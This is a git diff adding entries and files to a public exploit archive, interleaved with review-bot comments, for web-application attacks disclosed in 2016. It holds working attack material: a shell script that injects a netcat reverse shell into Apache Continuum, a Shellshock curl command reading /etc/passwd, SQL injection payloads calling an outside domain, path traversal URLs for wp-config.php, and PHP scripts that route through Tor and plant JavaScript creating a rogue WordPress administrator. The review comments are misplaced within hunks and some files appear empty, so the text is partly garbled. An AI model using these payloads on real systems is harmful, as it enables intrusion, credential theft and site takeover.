diff --git a/files.csv b/files.csv
index 7fe013597..7a1bdda4c 100755
--- a/files.csv
+++ b/files.csv
@@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
 15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
-15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
+15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
@@ -17286,7 +17286,7 @@ id,file,description,date,author,platform,type,port
 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0
 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998
 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998
-19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,metasploit,linux,local,0
+19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,metasploit,linux,local,0
 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0
 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0
 19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0
@@ -35511,7 +35511,7 @@ id,file,description,date,author,platform,type,port
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
-39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
+39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root",2016-01-19,"Perception Point Team",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@@ -35998,6 +35998,7 @@ id,file,description,date,author,platform,type,port
 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
+39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
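Review bot: The new 39883 row is inserted between 39809 and 39810, out of ID order, while every other row this commit adds (39884–39899) is appended at the end of the file in the next hunk. Tooling that walks files.csv expecting ascending IDs, or that takes the final row as the highest ID, will treat this one entry differently; moving the line down to sit with the 39884+ block keeps the index sorted and the commit self-consistent.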
@@ -36063,3 +36064,18 @@ id,file,description,date,author,platform,type,port
 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
+39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
+39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
+39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
+39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
+39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80
+39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80
+39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80
+39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS",2016-06-06,wp0Day.com,php,webapps,80
+39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80
+39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80
+39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File 
Upload",2016-06-06,wp0Day.com,php,webapps,80
+39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80
+39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80
+39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80
+39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80
diff --git a/platforms/asp/webapps/39897.txt b/platforms/asp/webapps/39897.txt
new file mode 100755
index 000000000..4373a4d5a
--- /dev/null
+++ b/platforms/asp/webapps/39897.txt
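Review bot: The port column of the new 39886 row (Apache Continuum) is 0, whereas the other web-application rows added here carry 80 and the 39886 advisory later in this diff shows the service answering on `:8080`; `39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,8080` would match the advisory. The appended block also skips ID 39885; if that entry was deliberately withheld this is fine, but it is worth confirming it was not dropped from the commit by mistake. The remaining 14 rows follow the existing column layout.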
@@ -0,0 +1,64 @@ +Exploit Title: Notilus SQL injection +Product: Notilus travel solution software +Vulnerable Versions: 2012 R3 +Tested Version: 2012 R3 +Advisory Publication: 03/06/2016 +Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] +CVE Reference: NONE +Credit: Alex Haynes + +Advisory Details: + + +(1) Vendor & Product Description +-------------------------------- + +Vendor: DIMO Software + + +Product & Version: +Notilus travel solution software v2012 R3 + + +Vendor URL & Download: +http://www.notilus.com/ + + +Product Description: +"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc." + + +(2) Vulnerability Details: +-------------------------- +The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields. + +Proof of concept: + +POST TO /company/profilv4/Password.aspx + +Vulnerable parameter: H_OLD + +Payload: +ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27 + + + + +(3) Advisory Timeline: +---------------------- +15/02/16 - First Contact: vendor requests details of vulnerability +03/03/16 - Follow up to vendor to inquire about availability of a fix. +03/03/16 - vendor responds that fix will be available 16/03/16. +16/03/16 - Vendor releases patch. + + + + +(4)Solution: +------------ +Patch to latest available 2012 R3 branch or upgrade to version 2016. + + +(5) Credits: +------------ +Discovered by Alex Haynes \ No newline at end of file 
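Review bot: The advisory lists `Vulnerable Versions: 2012 R3` and, under Solution, `Patch to latest available 2012 R3 branch or upgrade to version 2016`, so a reader cannot distinguish a patched 2012 R3 installation from a vulnerable one; the Solution line should name the patch level or build that carries the fix the timeline dates to 16/03/16, if the vendor published one. The header and timeline also mix date formats (`Advisory Publication: 03/06/2016` versus `15/02/16 - First Contact`), which is ambiguous across locales — ISO 8601 dates throughout would remove the doubt. `CVE Reference: NONE` should be revisited if an identifier was assigned after publication.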
diff --git a/platforms/cgi/webapps/39887.txt b/platforms/cgi/webapps/39887.txt new file mode 100755 index 000000000..89cec2546 --- /dev/null +++ b/platforms/cgi/webapps/39887.txt @@ -0,0 +1,17 @@ +# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop +# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client +# Date: 6/4/2016 +# Exploit Author: lastc0de@outlook.com +# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/ +# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html +# Version: 4.61.915 +# Tested on: Linux + +VULNERABLE FILE +http://target.com//tarantella/cgi-bin/modules.cgi + +POC : +localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt + +localhost@~#cat xixixi.txt +which will print out the content of /etc/passwd file. diff --git a/platforms/java/webapps/39886.txt b/platforms/java/webapps/39886.txt new file mode 100755 index 000000000..7af5ff680 --- /dev/null +++ b/platforms/java/webapps/39886.txt 
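Review bot: The advisory gives no remediation and no CVE reference, even though the flaw it describes is the well-known bash environment-variable (Shellshock) bug reached through a CGI script, not a defect specific to Secure Global Desktop; a `# Fix:` line stating that updating the host's bash package closes the issue regardless of the SGD version, together with the identifier assigned to the bash vulnerability, would make the entry useful to defenders. `# Date: 6/4/2016` is ambiguous (June 4 or April 6) and does not match the 2016-06-06 date recorded for this entry in files.csv. `# Tested on: Linux` could name the distribution and bash build, since the outcome depends entirely on whether bash has been patched.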
@@ -0,0 +1,48 @@ +# Exploit Title: Unauthenticated command injection - Apache Continuum +# Google Dork: inurl::8080/continuum/ +# Date: 04/06/2016 +# Exploit Author: David Shanahan (@cyberpunksec) +# Contact: http://www.procheckup.com/ +# Vendor Homepage: https://continuum.apache.org/ +# Software Link: https://continuum.apache.org/download.cgi +# Version: 1.4.2 +# Tested on: Debian + +--- Description --- + +Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/ +ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS. + +1) Command injection + +Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action + +Vulnerable Parameter - installation.varValue + +#!/bin/sh + +if [ $# -eq 0 ] + then + echo "$0 " + echo "Remember to set up your netcat listener" + exit 1 +fi + +cmd="\`nc $3 $4 -e /bin/sh\`" + +echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]" +echo "\t\t[ Procheckup - David Shanahan ]\n" +curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd" + + +2) Reflected XSS + +The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL. +If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them. 
+ +Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel + +Fix: +The Apache Continuum project is no longer maintained. Removal of the software is recommended. + +http://www.procheckup.com/ diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c index a39aa74f3..5460a569d 100755 --- a/platforms/linux/local/39277.c +++ b/platforms/linux/local/39277.c @@ -1,7 +1,9 @@ +/* # Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings # Date: 19/1/2016 # Exploit Author: Perception Point Team # CVE : CVE-2016-0728 +*/ /* CVE-2016-0728 local root exploit modified by Federico Bento to read kernel symbols from /proc/kallsyms diff --git a/platforms/php/webapps/39883.txt b/platforms/php/webapps/39883.txt new file mode 100755 index 000000000..3aa94f93d --- /dev/null +++ b/platforms/php/webapps/39883.txt 
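Review bot: The header states `# Version: 1.4.2` while the script's banner and the files.csv description say `<= v1.4.2`, so the affected range is given inconsistently; the header should read `# Version: <= 1.4.2` if earlier releases are affected, or the banner should be narrowed to the version actually tested. The Fix section only recommends removal because the project is unmaintained; for readers who cannot remove it immediately, an interim control — restricting network access to the Continuum listener to trusted hosts — would make the advice actionable. The shell script's usage message `echo "$0 "` prints no argument names even though the curl call reads `$1` to `$4`, so the help text is effectively empty and should list the expected arguments.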
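Review bot: The new `/*` ... `*/` wrapper around the `# Exploit Title`, `# Date`, `# Exploit Author` and `# CVE` lines is what lets the file compile, but it sits directly before the existing `/* CVE-2016-0728 local root exploit` comment, leaving two back-to-back comment blocks; folding the four header lines into that existing comment would keep a single file header. The files.csv description for this file is changed in the same commit to append `Local Root`, while the in-file `# Exploit Title` is unchanged, so the two titles now diverge. The rest of the comment and the code that follows are outside this hunk.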
@@ -0,0 +1,90 @@ +#################### +# Meta information # +#################### +# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities +# Date: 2016-06-02 +# Exploit Author: PizzaHatHacker [A] gmail [.] com +# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/ +# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip +# Version: 2.7.11 +# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2 +# +# History : +# 2016-02-21 Contact requested on the vendor website via "Contact Us" +# 2016-02-24 Contact requested on the vendor website via "Support" +# 2016-03-09 Email to plugins@wordpress.org +# 2016-03-10 Acknowledged by Wordpress team +# 2016-06-02 No information, no response, vulnerabilities not fixed, +# disclosure of this document. +# +################################## +### 1. Arbitrary File Deletion ### +################################## + +It is possible to remotely delete arbitrary files on the webserver on wordpress +blogs that have simple-backup plugin installed and enabled. No authentication +is required, the default configuration of simple-backup is affected. + +Example 1 : Delete "pizza.txt" in wordpress root : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt + +Example 2 : Delete .htaccess file protecting the backup folder : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting + +Note : When 'download_backup_file' parameter is provided with an invalid +filepath, the PHP script exits prematurely with message "Access Denied!" and so +does not regenerate automaticaly the .htaccess file. 
+After this request, it may be possible (depending on the web server +configuration) to browse the backup directory and download server backup files +at this URL : +http://127.0.0.1//simple-backup/ + +The backup archive files may contain all the wordpress files : configuration +files (wp-config.php etc.), PHP source code (plugins, etc.), and a database +dump (all tables content, wordpress users passwords etc.). + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) +CVSS Base Score : 7.5 +Impact Subscore : 6.4 +Exploitability Subscore : 10 + +######################## +### 2. File Download ### +######################## + +It is possible to download remote files from the webserver on wordpress blogs +that have simple-backup plugin installed and enabled. No authentication is +required, the default configuration of simple-backup is affected. + +Example 1 : Download tools.php source file : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file= + +Example 2 : Download a backup file : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar + +(If backups are performed automatically at predefined times, it is easy to +find the backup file name, as it is based on the current time). 
+ + +Moreover, the checks performed on user-provided 'filename' parameter are +insufficient : + +simple-backup-manager.php:function download_local_backup_file($filename){ +$filename = ltrim($filename, ".\/"); + +* Only logged-in AND authorized users (with permissions to manage backups) +should be allowed to download files +* The file name should match a backup file and must not be empty +* The input is not correctly checked for directory traversal (use PHP +'basename' instead of 'ltrim') + +For example in the special case where a folder 'oldBackups' is created inside +the backup directory, it would be possible to download ANY file on the web +server via direct requests to this kind of URLs : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N) +CVSS Base Score : 5 +Impact Subscore : 2.9 +Exploitability Subscore : 10 diff --git a/platforms/php/webapps/39884.html b/platforms/php/webapps/39884.html new file mode 100755 index 000000000..ed799bc0e --- /dev/null +++ b/platforms/php/webapps/39884.html @@ -0,0 +1,29 @@ + + + + +
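Review bot: The advisory has no remediation section: the History records that the vendor never responded and the text says the vulnerabilities are unfixed, but it stops at CVSS scoring without telling site owners what to do. Since both issues are reachable without authentication in the default configuration, a short closing section recommending that the plugin be deactivated and removed, and that the backup directory (`/simple-backup/`) be checked for web-accessible archives and protected at the web-server level, would make the entry actionable. The analysis already names the right code-level fixes (capability check, `basename` instead of `ltrim`, a non-empty name that must match an existing backup), so collecting them under a `Fix:` heading would also help anyone maintaining a fork.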
+ + + + +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39889.html b/platforms/php/webapps/39889.html new file mode 100755 index 000000000..8a3680513 --- /dev/null +++ b/platforms/php/webapps/39889.html @@ -0,0 +1,37 @@ + + + + +
+ + + + +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39890.txt b/platforms/php/webapps/39890.txt new file mode 100755 index 000000000..fe3c45208 --- /dev/null +++ b/platforms/php/webapps/39890.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online examination system 1.0 - SQL Injection +# Google Dork: inurl:showtest.php?subid= +# Date: 2016/06/05 +# Exploit Author: Ali Ghanbari +# Vendor Homepage: http://www.onlinefreeprojectdownload.com +# Sofware Link : +http://www.onlinefreeprojectdownload.com/download.php?name=projects/php%20projects/Online_exam.zip +# Version: 1.0 + +#Exploit: + +http://localhost/{PATH}/showtest.php?subid=[SQL Injection] + +#Admin Panel: + +http://localhost/{PATH}/admin + +#################################### + +[+]Exploit by: Ali Ghanbari + +[+]My Telegram :@Exploiter007 diff --git a/platforms/php/webapps/39891.txt b/platforms/php/webapps/39891.txt new file mode 100755 index 000000000..830bfac6c --- /dev/null +++ b/platforms/php/webapps/39891.txt 
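Review bot: The entry names the injectable parameter (`showtest.php?subid=`) but gives no disclosure timeline, vendor response or remediation, so a reader cannot tell whether a fixed release exists; a `# Fix:` line (prepared statements for `subid`, or a statement that no patch is available) and the vendor contact date would complete the advisory. The `# Sofware Link :` label has a typo. The `#Admin Panel:` line is not part of the finding and could be dropped.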
@@ -0,0 +1,34 @@ +#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload +#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector +#Date: 1-06-2015 +#Exploit Author: Aaditya Purani +#Author Details: https://aadityapurani.com +#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog +#Version: 3.5 +#Tested on: Kali Linux 2.0 Sana / Windows 10 + + +This Vulnerable has been disclosed to public yesterday about WP Mobile +Detector Arbitrary File upload for version <=3.5 in which attacker can +upload malicious PHP Files (Shell) into the Website. Over 10,000 users are +affected, Vendor has released a Patch in their version 3.6 & 3.7 at +https://wordpress.org/plugins/wp-mobile-detector/changelog/ . + +I have wrote a Complete POC post: + +https://aadityapurani.com/2016/06/03/mobile-detector-poc/ + +I have made a POC Video Here: +https://www.youtube.com/watch?v=ULE1AVWfHTU + +Simple POC: + +Go to: + +[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php] + +and it will get saved in directory: + +/wp-content/plugins/wp-mobile-detector/cache/shell.php + + diff --git a/platforms/php/webapps/39892.php b/platforms/php/webapps/39892.php new file mode 100755 index 000000000..d41e856dd --- /dev/null +++ b/platforms/php/webapps/39892.php 
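Review bot: `#Date: 1-06-2015` is off by a year: the body refers to a disclosure "yesterday", to a blog post dated 2016/06/03, and files.csv records the entry as 2016-06-06, so the header should read `#Date: 2016-06-01` in ISO form. The header's `#Version: 3.5`, the body's `<=3.5` and the note that the vendor patched in `3.6 & 3.7` are consistent, which is helpful; repeating the fixed versions in a `#Fix:` line near the top would let readers see the safe version at a glance. `This Vulnerable has been disclosed` should read `This vulnerability has been disclosed`.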
@@ -0,0 +1,198 @@ + + * Vendor Homepage: http://bridge.qodeinteractive.com/ + * Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054 + * Version: 9.1.3 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: Stored XSS, Ability to overwrite any theme settings. + * Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:f:c:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + + +function exploit(){ + global $curl, $options; + + switch ($options['m']){ + case 'm' : + //Maintanence mode + echo "Putting site in maintenece mode\n"; + $data = array('action' => 
'qodef_save_options', 'qode_maintenance_mode'=>'yes'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ".$resp."\n"; + break; + case 'x' : + //XSS Mode, create extra admin + echo "Injecting inject.js \n"; + $data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js")); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ".$resp."\n"; + + break; + } + + + +} + + + +logIn(); +exploit(); + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){ + return false; + } + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} + +?> +inject.js +}); + +//Get Token +var domain = location.protocol+'//'+document.domain; +var url = domain+'/wp-admin/user-new.php'; +var JQ = jQuery.noConflict(); +JQ.ajax({ + "url": url, + "success" : function(x){ + //Got the response + console.log('Got response'); + var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g; + var m = re.exec(x); + if (m[2].match(/([a-z0-9]{10})/)) { + var nonce = m[2]; + console.log('Got nonce '+nonce); + } + console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin '); + JQ.ajax({ + "url": url, + "method" : "POST", + "data" : + { "action":"createuser", + "_wpnonce_create-user": nonce, + "_wp_http_referer" : "/wp-admin/user-new.php", + "user_login": 
"wp0day_poc", + "email" : "contact@wp0day.com", + "first_name" : "Exploit", + "last_name" : "Poc", + "url" : "http://wp0day.com/", + "pass1" : "secret", + "pass1-text" : "secret", + "pass2" : "secret", + "send_user_notification" : 0, + "role":"administrator", + "createuser" : "Add+New+User" + }, + "success" : function(x){ + console.log("Register done"); + } + }); + + } +}); + + + +$j(document).ready(function(){ diff --git a/platforms/php/webapps/39893.php b/platforms/php/webapps/39893.php new file mode 100755 index 000000000..c07bcf3b8 --- /dev/null +++ b/platforms/php/webapps/39893.php 
@@ -0,0 +1,177 @@ + + * Vendor Homepage: http://wordpress-advertising.com/ + * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693 + * Version: 4.6.18 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: SQLi, Unserialize, File Delete. + * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:f:c:u:p:s:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + +class CPDF_Adapter{ + + + private $_image_cache; + public function set_file($file){ + $this->_image_cache = array($file); + } +} + + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + + + +function exploit(){ + global $curl, $options; + + if 
